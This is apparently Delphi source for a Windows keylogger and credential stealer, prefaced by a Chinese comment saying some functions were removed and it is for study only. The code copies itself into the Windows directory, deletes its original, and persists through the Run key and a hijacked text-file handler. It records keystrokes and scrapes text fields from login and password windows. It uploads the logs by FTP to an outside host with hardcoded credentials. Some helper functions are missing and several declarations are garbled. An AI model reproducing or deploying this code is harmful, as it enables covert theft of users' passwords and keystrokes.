// 删除了一些函数,给你学习一下,不准出去害人
// 作者:司马华鹏
program Mstask;
uses
Windows,
Messages,
Sysutils,
wininet;
Var
hWnd:Thandle;
hList:Thandle;
WinClass:TwndClassEx;
Msg:Tmsg;
strTitle:string;
hHook :Integer;
Kybd:HKL;
strKey :string;
strCap :string;
BoolOS :Boolean;
BoolSend :boolean;
strWin :string;
MutexHandle: THandle;
Session:HINTERNET;
Server :HINTERNET;
strApp:string;
BoolSending:boolean;
{$R *.RES}
//自我删除
procedure DeleteSelf;
var
F: TextFile;
batName: string;
pi: TProcessInformation;
si: TStartupInfo;
begin
batName := strWin + '/Kill.bat';
AssignFile(F,batName);
Rewrite(F);
Writeln(F,':try');
Writeln(F,'del "'+ParamStr(0)+'"');
Writeln(F,'if exist "'+ ParamStr(0)+'"'+' goto try');
Writeln(F,'del "' + batName + '"' );
CloseFile(F);
FillChar(si, SizeOf(si), $00);
si.dwFlags := STARTF_USESHOWWINDOW;
si.wShowWindow := SW_HIDE;
if CreateProcess( nil, PChar(batName), nil, nil, False,
IDLE_PRIORITY_CLASS,
nil, nil, si, pi ) then
begin
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
end;
end;
//写注册表文件
procedure RegSet(const ExeName:string);
Var
SubKey:string;
hK :hKey;
strTmp
Char;
strRun:string;
begin
SubKey := 'Software/Microsoft/Windows/CurrentVersion/Run';
RegCreateKey (HKEY_LOCAL_MACHINE, PCHAR(SubKey), hK);
strTmp:=PChar(ExeName);
RegSetValueEx (hK, 'TaskAgents' , 0, REG_SZ,
strTmp, strlen(strTmp)+1);
strRun:=ExeName + ' %1';
strTmp:=PChar(strRun);
RegSetValue (HKEY_CLASSES_ROOT,'txtfile/shell/open/command',REG_SZ,strTmp,StrLen(strTmp)+1);
RegCloseKey (hK);
end;
//保存文件
procedure SaveOurFile();
var
Count :integer;
Item
char;
F :textFile;
Index,I :integer;
begin
Count:=SendMessage(hList, LB_GETCOUNT, 0,0);
if Count >1 then
begin
try
assignFile(F,strWin+ '/yalong.txt');
if FileExists(strWin + '/yalong.txt') then
append(F)
else
ReWrite(f);
for I:= 0 to Count-1do
begin
Index:=SendMessage(hList,LB_GETTEXTLEN,I,0)+1;
GetMem(item,index);
SendMessage(hList, LB_GETTEXT, I,longInt(item));
Writeln(F,item);
Freemem(item,0);
end;
finally
WriteLn(F,DateTimeToStr(now));
CloseFile(F);
end;
end;
end;
//得到应用程序名
function GetAppName(hwindow: THandle): string;
var
h : HMODULE;
L : DWord;
begin
SetLength(Result, 100);
h:=GetClassLong(hwindow, GCL_HMODULE);
L:=GetModuleFileName(h, PChar(Result), 100);
SetLength(Result, L);
end;
//判断是否连接入网络
function GetOnlineStatus : Boolean;
var ConTypes : Integer;
begin
ConTypes := INTERNET_CONNECTION_MODEM + INTERNET_CONNECTION_LAN + INTERNET_CONNECTION_PROXY;
if (InternetGetConnectedState(@ConTypes, 0) = False) then
Result := False else
Result := True;
end;
Function FtpConnect() : Boolean;
begin
Result:=false;
Session := InternetOpen('Yalong', INTERNET_OPEN_TYPE_DIRECT, '', '', 0);
If Session = nil then
begin
SetwindowText(hwnd,'error1');
InternetCloseHandle(Session);
end
else
begin
Server := InternetConnect(Session, 'homeftp.etang.com', 21, 'smhp', '471023198200', INTERNET_SERVICE_FTP, INTERNET_FLAG_PASSIVE, 0);
If Server = nil then
begin
InternetCloseHandle(Session);
end
else
result:= True;
end;
end;
//上传文件
function FtpUp():Boolean;
var
Kam:string;
hFile:HINTERNET;
sFile:File;
cnt
WORD;
Buf:array [0..1023] of byte;
nRet
WORD;
begin
FtpSetCurrentDirectory (Session, '/');
Kam := '/' + datetimetostr(Now)+'.txt';
hFile := FtpOpenFile(Server, pchar(Kam), GENERIC_WRITE, FTP_TRANSFER_TYPE_BINARY, 0);
if hFile=nil then
begin
Result:=false;
end
else
begin
try
Assignfile(sFile,strWin + '/' + 'yalong.txt');
Reset(sFile,1);
repeat
BlockRead(sFile,Buf,sizeof(Buf),Cnt);
InternetWriteFile(hFile, @(Buf[0]), Cnt, nRet);
until Cnt<sizeof(Buf);
finally
Closefile(sFile);
InternetCloseHandle(Session);
Result:=DeleteFile(strWin + '/' + 'yalong.txt');
end
end;
end;
//时间回调
function MyTimerFroc(hwnd:Thandle;nMsg:UINT;idEvent:UINT;dwTime:CarDinal):CarDinal;export;stdcall;
begin
Result:=1;
if nMsg= WM_TIMER then
begin
if BoolSending=false then
begin
if GetOnlineStatus = true then
begin
BoolSending:=true;
if FtpConnect=True then
begin
if FtpUp=True then
begin
BoolSend:=true;
killTimer(hwnd,2);
end
else
BoolSending:=False
end;
end;
end;
end;
end;
//得到系统目录
function getWinDir():string;
var
StrPath:array[0..31] of char;
begin
getwindowsdirectory(strpath,31);
getWinDir:=strpas(strpath);
end;
function HookProc(iCode:Integer;wParam:wParam;lParam:lParam):LRESULT;stdcall;
var
EventArr: EVENTMSG;
tmpStr :string;
recOK :short;
begin
RecOK:=1;
Result:=0;
if iCode < 0 then
Result := CallNextHookEx(hHook,iCode,wParam,lParam)
else
if iCode = HC_SYSMODALON then
recOK:=0
else
if iCode = HC_SYSMODALOFF then
recOK:=1
else
if ((recOK>0) and (iCode = HC_ACTION)) then
begin
EventArr:=pEventMSG(lParam)^;
if Eventarr.message = WM_KEYDOWN then
begin
tmpStr := BoolActive;
if tmpStr<>'' then
begin
if tmpStr=strCap then
strkey:=Strkey +TransKeyCode(EventArr.paramH)
else
begin
if strkey <>'' then
SendMessage(hList, LB_ADDSTRING, 0,longint(strcap + strkey));
strkey:=TransKeyCode(EventArr.paramH);
strCap :=tmpStr;
end;
end
else
begin
if strkey <>'' then
SendMessage(hList, LB_ADDSTRING, 0,longint(strcap + strkey));
strkey:='';
strCap:='';
end;
end;
end;
end;
function EnumChildProc(HWnd: Integer;
lParam: longint): Boolean;
Export;
StdCall;
var
ClsName : array[0..31] of char;
P: PChar;
len :LongInt;
begin
try
GetClassName(HWnd, ClsName, 31);
If (strpas(ClsName)= 'Edit') or (strpas(ClsName)= 'ComboBox') then
begin
len:=sendmessage(HWnd,WM_GETTEXTLENGTH,0,0)+1;
GetMem(p, len);
sendmessage(HWnd,WM_GETTEXT,len,longint(P));
if SendMessage(hList, LB_FINDSTRINGEXACT, -1, LongInt(strTitle + P)) = -1 then
begin
SendMessage(hList, LB_ADDSTRING, 0, LongInt(strTitle + P));
end;
FreeMem(P, 0);
end;
finally
Result:=True;
end;
end;
function EnumWindowsFunc (WindowHandle: Thandle;lParam: longInt): Boolean;
Export;
StdCall;
var
Name
char;
Leng:Integer;
begin
leng:= GetWindowTextLength(WindowHandle)+1;
getMem(name,Leng);
GetWindowText(WindowHandle,Name,leng);
strTitle:=string(name);
if strTitle <> '' then
begin
if (strPos(Name,pchar('连接'))<>Nil)
or (strPos(Name,pchar('登录'))<>Nil)
or (strPos(Name,pchar('密码'))<>Nil)
or (strPos(Name,pchar('注册'))<>Nil) then
begin
EnumChildWindows(WindowHandle, @EnumChildProc, 0);
end;
end;
Result := True;
Freemem(name,0);
end;
procedure Set_Hide();
var
RegisterServiceProcess :function (dwProcessID, dwType: DWord) : DWord;
DllName:string;
Buffer:array [0..127] of char;
Lib:Thandle;
begin
DllName:='KERNEL32.DLL';
strPcopy(buffer,Dllname);
Lib:=LoadLibrary(Buffer);
if Lib<>0 then
try
RegisterServiceProcess:=GetProcAddress(Lib,'RegisterServiceProcess');
RegisterServiceProcess (GetCurrentProcessID, 1);
finally
freeLibrary(Lib)
end
else
Messagebox(hwnd,'DLL错误','系统错误',0);
end;
function WinFroc(hwnd:Thandle;nMsg:UINT;wParam,lParam:CarDinal):CarDinal;export;stdcall;
Var
K1,K2
Char;
Os :OSVERSIONINFO;
myName :string;
begin
result:=0;
case nMsg of
WM_CREATE: //初始化
begin
BoolSending:=False;
BoolSend:=False ;
strwin:=getWinDir;
strApp:=GetAppName(Hwnd);
//得到应用程序的名字
myName := ExtractFilename(strApp);
//从名字中分离出EXE
RegSet(GetWindir +'/'+ myName);
//注册自动运行
if strApp <> (GetWindir +'/'+ myName) then
//如果自己不在系统目录
begin
Copyfile(pchar(strApp), pchar(GetWindir +'/'+ myName), False);
DeleteSelf;
//删除遗留痕迹
postmessage(hwnd,WM_CLOSE,0,0);
//退出
end;
SendMessage(hList, LB_ADDSTRING, 0,longint(DateTimeToStr(now)));
os.dwOSVersionInfoSize := sizeof(os);
GetVersionEx(os);
if os.dwPlatformId <>1 then
BoolOs:=True else
BoolOS:=False;
if BoolOS=true then
//如果在NT下运行,那么
begin
hHook:=SetwindowsHookEx(WH_JOURNALRECORD,HookProc,HInstance,0);
Getmem(K1,10);
GetKeyboardLayoutName(K1);
Getmem(K2,10);
GetKeyboardLayoutName(K2);
If (K1 <> K2) then
Kybd:= LoadKeyboardLayout(K1, 1);
Freemem(k1,0);
FreeMem(K2,0);
end
else
Set_Hide;
//如果不在NT下运行,注册为系统程序
setTimer(Hwnd,1,50,nil);
//申请两个计数器
setTimer(Hwnd,2,10000,@MyTimerFroc);
end;
WM_DESTROY: //退出
begin
//撤消两个计数器
KillTimer(Hwnd,1);
KillTimer(Hwnd,2);
if BoolOS=true then
begin
UnHookWindowsHookEx(hHook);
hHook:=0;
end;
SaveOurFile;
//保存文件
PostQuitMessage(0);
//退出程序
end;
WM_TIMER:
EnumWindows(@EnumWindowsFunc, 0);
//枚举当前窗体
else
Result:=defWindowProc(hwnd,nMsg,Wparam,lParam) //系统保留处理
end;
end;
begin
if ParamCount> 0 then
begin
//(* 有执行参数传入 *)
winexec(pchar('Notepad.exe ' + ParamStr(1)),sw_show);
//执行应用程序
end;
MutexHandle := CreateMutex(nil, TRUE, 'SysTask');
//判断有无实例先
if MutexHandle <> 0 then
begin
if GetLastError = ERROR_ALREADY_EXISTS then
begin
CloseHandle(MutexHandle);
Halt;
end;
end;
WinClass.cbSize :=sizeof(TWndClassEx);
WinClass.lpszClassName :='MsTask';
WinClass.style :=CS_HREDRAW Or CS_VREDRAW;
WinClass.hInstance :=Hinstance;
WinClass.lpfnWndProc :=@WinFroc;
WinClass.cbClsExtra :=0;
WinClass.cbWndExtra :=0;
WinClass.hIcon :=loadicon(hinstance,makeintresource('MAINICON'));
WinClass.hIconsm :=loadicon(hinstance,makeintresource('MAINICON'));
WinClass.hCursor :=loadcursor(0,idc_arrow);
WinClass.hbrBackground :=GetStockobject(Black_brush);
WinClass.lpszMenuName :=nil;
if registerclassex(WinClass)=0 then
begin
exit;
end;
Hwnd:=CreateWindowEx(WS_EX_OVERLAPPEDWINDOW,
WinClass.lpszClassName ,
'MsTask',
Ws_overLappedWindow,
0,0,
500,500,
0,0,HINSTANCE,NIL);
hList:= CreateWindowEx(WS_EX_OVERLAPPEDWINDOW,
'LISTBOX',
'',
WS_VISIBLE + WS_CHILD + CBS_AUTOHSCROLL + CBS_DISABLENOSCROLL + CBS_HASSTRINGS + CBS_SORT + CBS_DROPDOWN,
0,0,500,500,
Hwnd, 0,
HINSTANCE, Nil);
IF hWND<>0 then
begin
ShowWindow(Hwnd,SW_HIDE);
UpdateWindow(Hwnd);
end
else
exit;
while GetMessage(msg,0,0,0)do
begin
Translatemessage(msg);
DispatchMessage(msg);
end;
end.